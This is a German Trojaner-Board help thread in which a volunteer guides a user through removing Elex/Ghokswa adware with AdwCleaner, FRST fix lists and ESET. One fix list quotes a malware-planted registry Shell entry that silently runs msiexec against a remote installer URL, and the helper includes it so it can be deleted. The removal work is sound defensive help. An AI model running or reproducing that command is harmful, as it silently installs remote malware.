![]() |
Adware.Elex kommt immer wieder Guten Abend werte Community & Profis, ich bin neu hier, benutze schon seit ewigkeiten Windows (seit 95, strenggenommen aber seit XP) und habe mir erstmals einen Virus eingefangen, den ich nicht los werde. (woher er kommen kann? keine ahnung, mir ist nichts auffälliges aufgefallen) Bemerkt das etwas nicht stimmt habe ich dadurch, dass sich der Browser Firefox ohne mein Wissen installiert hat (mein Windows 10 ist noch nicht allzu alt, da ich es vor ein paar Monaten neu installiert habe). Mein PC läuft auch generell sehr sehr lange und mir ist ebenfalls in Abwesenheit aufgefallen, dass sich mein Chrome geschlossen hatte. Das war am 21.04.17, also habe ich Malwarebytes durchlaufen gelassen und der hat auch Adware.Elex erkannt und gelöscht, anschließend hab ich noch ein paar mal den Scan durchlaufen lassen, und er hat insgesamt nun relativ oft was erkannt, zwischendurch schien aber alles mal wieder "clean" zu sein, und er hat nichts erkannt. Seitdem schaue ich auch regelmäßig was so im Taskmanager offen ist, da ist mir allerdings auch nichts aufgefallen (außer am anfang ein Dienst und ein Prozess vom Firefox, welchen ich deaktiviert und geschlossen habe). Sicherheitshalber habe ich auch Chrome komplett neu installiert (inkl. die Addons uMatrix(hier nur geändert, dass Scripts standartmäßig geblockt werden) und uBlock Origin, ansonsten verwende ich i.d.R. nur das E-Mail Addon von Web.de, welches mir derzeit aber zu riskant zu benutzen ist, eben aufgrund der Viren) hier mal eine genaue Auflistung der Scan-Berichte, betroffene Log Dateien poste ich natürlich unten: 18.04.17 06:45 clean >21.04.17 01:19 nicht clean, individuell (alle festplatten), (Adware.Ghokswa Regestrierungswert & schlüssel, adware.Elex als firefox), der scan hat 2 Stunden gedauert, deswegen der nächste scan so spät >21.04.17 03:20 nicht clean, bedrohung, viel Adware.Elex, PUP.Optional.Elex und PUP.Optional.Ghokswa und ein mal PUP.Optional.SearchInMe 21.04.17 03:24 clean, bedrohung, ist 4 Minuten nach dem Scan davor. 21.04.17 03:27 clean, bedrohung 21.04.17 03:29 clean, hyper 21.04.17 03:29 clean, bedrohung 21.04.17 03:32 clean, inviduell(alle Festplatten) inkl. Rootkits, 2 Std. Scanzeit 21.04.17 05:32 clean, bedrohung >22.04.17 02:25 nicht clean, bedrohung, Trojan.WisdomEyes als Regestrirungswert & Schlüssel, auch als Datei in Appdata\Roaming\SSMgre\SSRec & SSRec\JTFW & JTFW\JTFW.dll. Zudem noch Adware.Ghokswa (ich denke getarnt als Chrome, sah zmd. vom Ordnerinhalt danach aus unter den Namen "Everbean") Zuvor hab ich selbst schon im Programme (x86) den Everbean Ordner gelöscht, die Ergebnisse hier beziehen sich auf den Pfad Appdata\Local\Everbean 22.04.17 04:24 clean, bedrohung inkl. rootkits 22.04.17 04:26 clean, hyper 22.04.17 04:41 clean, bedrohung inkl. rootkits 22.04.17 04:28 clean, hyper 22.04.17 04:51 clean, Individuell inkl. rootkits, weiß nicht mehr welche Festplatten, C war dabei 22.04.17 05:59 clean, bedrohung inkl. rootkits 22.04.17 06:05 clean, hyper 22.04.17 06:28 clean, bedrohung inkl. rootkits 22.04.17 07:50 clean, hyper 22.04.17 07:52 clean, hyper 22.04.17 08:00 clean, individuell inkl. rootkits, weiß nicht mehr welche Festplatten, C war dabei 22.04.17 08:36 clean, individuell, ohne rootskits, nur externe Festplatte Mein Daten Backup Server im Netzwerk ließ sich leider nicht via Malwarebytes überprüfen, sondern nur via. Windows defender, der hat nichts gefunden. 22.04.17 09:56 clean, bedrohung inkl. rootkits 22.04.17 11:13 clean, bedrohung inkl. rootkits 23.04.17 02:24 clean, bedrohung >23.04.17 23:19 nicht clean, bedrohung inkl. rootkits, Adware.Elex Prozessmodul & Datei & Regestrierungsschlüssel, in Programdata\microsoft\office\packagelocker.dll 23.04.17 23:26 clean, bedrohung inkl. rootkits 24.04.17 00:19 clean, bedrohung inkl. rootkits laufend: individuell inkl. rootskits, alle festplatten was habe ich in dem Zeitraum gemacht? Eigentlich nicht viel, nur auf sicheren Seiten gewesen und die Steam Version von Resident Evil4 HD Remaster gespielt, allerdings mit von der Community gemoddeten HD Texturen inkl. gepatchter .exe Datei. (scheint für mich aber sehr seriös, in deren Kommentar-Sektion scheint keiner Probleme damit in Verbindung zu bringen, Virenscans haben dahingehend auch nichts ergeben.) Es ist mir generell ein Rätsel, wie und wo ich mir den eingefangen habe, da ich eigentlich immer sehr behutsam vorgehe... Vielen lieben Dank schonmal im voraus, dass sich die Mühe gemacht wird, mir und anderen Leuten zu helfen, auch wenn ich gehofft habe, niemals eure Hilfe zu brauchen :) Liebe Grüße, Andy Hier noch die Log-Dateien: Addition.txt Code: Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01 Code: Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 23-04-2017 01 Code: Malwarebytes |
die 2 Weiteren Malwarebyte Scans, einer ist leider zu groß, wäre nr. 3 von 4: Malwarebytes infizierter Scan 2: Code: Malwarebytes Malwarebytes infizierter Scan 4: Code: Malwarebytes |
:hallo: Ich habe dein Thema in Arbeit und melde mich so schnell als möglich mit weiteren Anweisungen. Bitte beachte, dass alle meine Antworten zuerst von einem Ausbilder freigegeben werden müssen, bevor ich diese hier posten darf. Dies garantiert, dass Du Hilfe von einem ausgebildeten Helfer bekommst. Ich bedanke mich für deine Geduld :) |
Hallo und :hallo: Bevor wir beginnen beachte bitte Folgendes:
![]() Ich kann Dir niemals eine Garantie geben, dass wir alle schädlichen Dateien finden werden. Eine Formatierung ist meist der schnellere und immer der sicherste Weg, aber auch nur bei wirklicher Malware empfehlenswert. Adware & Co. können wir sehr gut entfernen. Solltest Du Dich für eine Bereinigung entscheiden, arbeite solange mit, bis Du mein clean :daumenhoc bekommst Schritt 1: Downloade Dir bitte AdwCleaner auf deinen Desktop.
Schritt 2: Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Schritt 3:
|
Hallo Tician und vielen Dank für deine Hilfe. Hier die neuen Logs: AdwCleaner (AdwCleaner[C0].txt): Code: # AdwCleaner v6.046 - Bericht erstellt am 25/04/2017 um 05:15:56 Code: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Code: Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 23-04-2017 01 Code: Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01 |
Hi, na dann machen wir uns ans Werk :) Schritt 1: Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code: HKU\S-1-5-21-1446151640-2387740664-487604262-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1WF8EdFTRXM8EcMkQLMdQLNUM8FkRSNWhSMkJSF8YcMc== /q Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Schritt 2: Hinweis: Der Scan mit ESET kann länger dauern! ESET Online Scanner
Schritt 3:
Macht der PC noch Probleme? |
Ich habe leider vergessen, dass ich das Premium Trial von Malwarebytes noch aktiviert hatte, der hat heute früh nämlich einen automatischen Suchlauf gestartet. Das gefundene habe ich nicht in Quarantäne versetzt, da ich deine Meinung abwarten möchte. Hier die neuen Logs: Malwarebytes: Code: Malwarebytes Code: Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 26-04-2017 ESET: Code: ESETSmartInstaller@High as downloader log: Addition.txt: Code: Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 26-04-2017 Was hat es mit dem Treiber (ehdrv.sys) konnte nicht geladen werden auf sich? Sehe grade, dass es erst bei diesem FRST Durchlauf kommt. (muss nicht beantwortet werden, frage nur aus Interesse) FRST.txt: Code: Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 26-04-2017 |
Hi, der 2. Teil von FRST (Addition.txt) fehlt noch, den bitte noch nachreichen. Danach gehe ich gerne auf deine Fragen ein :) |
warum fehlt? Der ist doch über FRST.txt, der vorletzte CODE. hier nochmal, sofern du das meintest, habs wohl oben etwas unvorteilhaft formuliert. Addition.txt: Code: Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 26-04-2017 |
Hi, entschuldige, du hast recht das Log war da, ich muss nur die Augen aufmachen :stirn: Es tut mir leid das es so lange gedauert hat. Zitat:
Zitat:
Zitat:
Ein paar Reste müssten noch weg, dann sind wir durch :) Schritt 1: Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code: 2017-04-20 16:58 - 2017-04-20 16:58 - 00000000 _____ C:\Windows\SysWOW64\33 Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
------------------------------------------------------- Wichtig für dich: Java aktualisieren. Dein PC ist nun clean :daumenhoc Lade dir jetzt Delfix http://filepony.de/icon/tiny/delfix.png herunter:
Hinweis: DelFix entfernt u. a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst. Starte deinen Rechner abschließend neu. Malwarebytes Anti-Malware http://filepony.de/icon/tiny/malware...ti_malware.png und ESET http://filepony.de/icon/tiny/eset_online_scanner.png kannst du über die Systemsteuerung deinstallieren, ich würde dir allerdings raten beides zu behalten und deinen PC damit ab und an zu scannen. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein kannst du sie bedenkenlos löschen. Lass mich dir einen Rucksack voll mit Tipps und Hinweisen geben um ein Wiedersehen so gut wie möglich zu vermeiden :) Absicherung:
Dein Verhalten im Internet:
Unterstütze uns! Wenn du mit meiner Bereinigung zufrieden warst würden wir uns über eine Spende freuen. Dies kannst du hier tun: http://www.trojaner-board.de/79994-s...ndenkonto.html. Auch über Feedback und Verbesserungsvorschläge freuen wir uns, schau dazu doch hier vorbei! Ansonsten bleibt mir nur noch dir alles Gute zu wünschen und bedanke mich für deine Mitarbeit und dein Vertrauen :abklatsch: |
Ich bin froh, dass wir helfen konnten :abklatsch: In diesem Forum kannst du eine kurze Rückmeldung zur Bereinigung abgeben, sofern du das möchtest: Lob, Kritik und Wünsche Klicke dazu auf den Button "NEUES THEMA" und poste ein kleines Feedback. Vielen Dank! :) Dieses Thema scheint erledigt und wird aus meinen Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke mir bitte eine Profilnachricht inklusive Link zum Thema. Jeder andere bitte hier klicken und einen eigenen Thread erstellen. |
Alle Zeitangaben in WEZ +1. Es ist jetzt 17:35 Uhr. |
Copyright ©2000-2025, Trojaner-Board